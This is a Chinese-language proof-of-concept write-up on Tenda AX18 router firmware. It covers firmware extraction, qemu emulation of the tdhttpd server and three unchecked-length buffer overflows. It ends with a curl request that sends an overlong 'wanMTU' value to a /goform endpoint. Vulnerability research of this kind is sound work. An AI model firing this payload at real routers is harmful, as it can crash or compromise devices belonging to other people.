Tenda AX18 POC
固件下载地址: https://www.tenda.com.cn/product/download/AX1806.html
下载以后用binwalk分离
发现是ubi
安装ubi_reader
sudo apt install liblzo2-dev -y
sudo pip install python-lzo
sudo pip install ubi_reader
admire@DESKTOP-AK68JJT:/mnt/d/Downloads/Compose/US_AX1806V2.0br_V1.0.0.1_cn/_US_AX1806V2.0br_v1.0.0.1_cn_2990_ZGDX01_2.bin.extracted$ ~/.local/bin/ubireader_extract_images 100040.ubi
UBI_File Warning: end_offset - start_offset length is not block aligned, could mean missing data.
admire@DESKTOP-AK68JJT:/mnt/d/Downloads/Compose/US_AX1806V2.0br_V1.0.0.1_cn/_US_AX1806V2.0br_v1.0.0.1_cn_2990_ZGDX01_2.bin.extracted$
将文件解密出来
~/.local/bin/ubireader_extract_files 100040.ubi
安装qemu-system
sudo apt install qemu-system -y
将httpd服务启动开
在这里叫tdhttpd
sudo qemu-arm-static -L . ./bin/tdhttpd
发现监听了80端口
sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0
搭建网桥
cp $(which qemu-arm-static) .
sudo chroot ./ ./qemu-arm-static ./bin/tdhttpd
fromAdvSetMacMtuWan内调用函数 sub_658D8,sub_658D8内字符串拷贝前未对输入参数做长度判断
form_fast_setting_wifi_set 函数在处理 timeZone参数时未对长度进行判断
fromSetIpMacBind,未对长度进行判断,无论如何都将内容拷贝到v20变量中
curl -H "Content-Type: application/json" -X POST -d '{"wanMTU": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}' "http://172.16.96.20/goform/GetParentControlInfo"
curl测试漏洞